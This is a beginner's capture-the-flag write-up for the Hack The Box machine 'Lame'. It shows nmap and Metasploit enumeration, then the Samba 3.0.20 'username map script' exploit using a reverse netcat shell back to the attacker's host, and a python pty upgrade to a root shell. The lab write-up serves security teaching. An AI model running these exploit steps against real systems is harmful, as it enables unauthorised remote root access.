Lame is a beginner friendly box that tests the user’s ability to enumerate with Metasploit. This machine is often the first challenge that new users will tackle on the Hack The Box platform, and this fact is reflected in the box’s difficulty.
Step 1: Enumerate with NMAP
We first run NMAP against the target to see what ports are open and which services are running.
➜ lame nmap -v -A 10.129.23.42 -p- -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-18 21:19 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:19
Completed NSE at 21:19, 0.00s elapsed
Initiating NSE at 21:19
Completed NSE at 21:19, 0.00s elapsed
Initiating NSE at 21:19
Completed NSE at 21:19, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:19
Completed Parallel DNS resolution of 1 host. at 21:19, 0.03s elapsed
Initiating Connect Scan at 21:19
Scanning 10.129.23.42 [65535 ports]
Discovered open port 139/tcp on 10.129.23.42
Discovered open port 21/tcp on 10.129.23.42
Discovered open port 445/tcp on 10.129.23.42
Discovered open port 22/tcp on 10.129.23.42
Connect Scan Timing: About 20.30% done; ETC: 21:21 (0:02:02 remaining)
Connect Scan Timing: About 48.65% done; ETC: 21:21 (0:01:04 remaining)
Discovered open port 3632/tcp on 10.129.23.42
Completed Connect Scan at 21:20, 104.29s elapsed (65535 total ports)
Initiating Service scan at 21:20
Scanning 5 services on 10.129.23.42
Completed Service scan at 21:21, 11.09s elapsed (5 services on 1 host)
NSE: Script scanning 10.129.23.42.
Initiating NSE at 21:21
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 21:21, 40.04s elapsed
Initiating NSE at 21:21
Completed NSE at 21:21, 0.07s elapsed
Initiating NSE at 21:21
Completed NSE at 21:21, 0.00s elapsed
Nmap scan report for 10.129.23.42
Host is up (0.025s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.29
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)
NSE: Script Post-scanning.
Initiating NSE at 21:21
Completed NSE at 21:21, 0.00s elapsed
Initiating NSE at 21:21
Completed NSE at 21:21, 0.00s elapsed
Initiating NSE at 21:21
Completed NSE at 21:21, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 156.10 seconds
We can see that ports 22, 139, 445, and 3632 are exposed. Port 22 is usually not a viable attack vector, so my first inclination was to start with the Samba ports, 139 and 445.
Step 2: Enumerating Samba
After searching fruitlessly for Samba enumeration techniques that would work on this box, I eventually tried metasploit’s smb_version scanner.
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 10.129.23.42
rhosts => 10.129.23.42
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 10.129.23.42:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 10.129.23.42:445 - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 10.129.23.42: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We simply supply the ip address of the box we want to scan and, hopefully, metasploit will return a valid result. In this case we can see that the Samba version is 3.0.20.
Step 3: Exploiting Samba 3.0.20
Our next step is to find an exploit to run against the target software and version, Samba 3.0.20. After some searching I was able to find another Metasploit module to exploit Samba: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script/. This module specifies a username containing shell meta characters that allow attackers to execute commands of their choosing. In this case, we want to gain shell access to the target.
sf6 auxiliary(scanner/smb/smb_version) > search username map
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/imap/imail_delete 2004-11-12 average No IMail IMAP4D Delete Overflow
1 exploit/windows/imap/mailenable_w3c_select 2005-10-03 great Yes MailEnable IMAPD W3C Logging Buffer Overflow
2 auxiliary/scanner/oracle/oracle_login normal No Oracle RDBMS Login Utility
3 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
4 exploit/linux/imap/imap_uw_lsub 2000-04-16 good Yes UoW IMAP Server LSUB Buffer Overflow
Interact with a module by name or index. For example info 4, use 4 or use exploit/linux/imap/imap_uw_lsub
msf6 auxiliary(scanner/smb/smb_version) > use 3
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
In this case, we need to supply the ip address of the target, as well as the ip address and listening port of the attacker. We can then run the attack against the target.
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.0.173 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/samba/usermap_script) > set rhosts 10.129.23.42
rhosts => 10.129.23.42
msf6 exploit(multi/samba/usermap_script) > set lhost 10.10.14.29
lhost => 10.10.14.29
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 10.10.14.29:4444
[*] Command shell session 1 opened (10.10.14.29:4444 -> 10.129.23.42:53012) at 2023-01-18 21:43:09 -0500
We can see that a command session was opened, but we have no indicator of such progress. We can try running the ’ls’ command to see if we are really in a remote linux filesystem.
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
initrd.img.old
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
The above output indicates that we are on a remote linux system, but we don’t have a proper terminal. After checking to see if python is installed on the remote machine, we can run the following command to upgrade our shell.
python --version
Python 2.5.2
python -c 'import pty; pty.spawn("/bin/bash")'
root@lame:/#
We can now see that we have access to the root account and the challenge has been completed. We now just need to navigate to each user’s desktop to collect the flag and submit.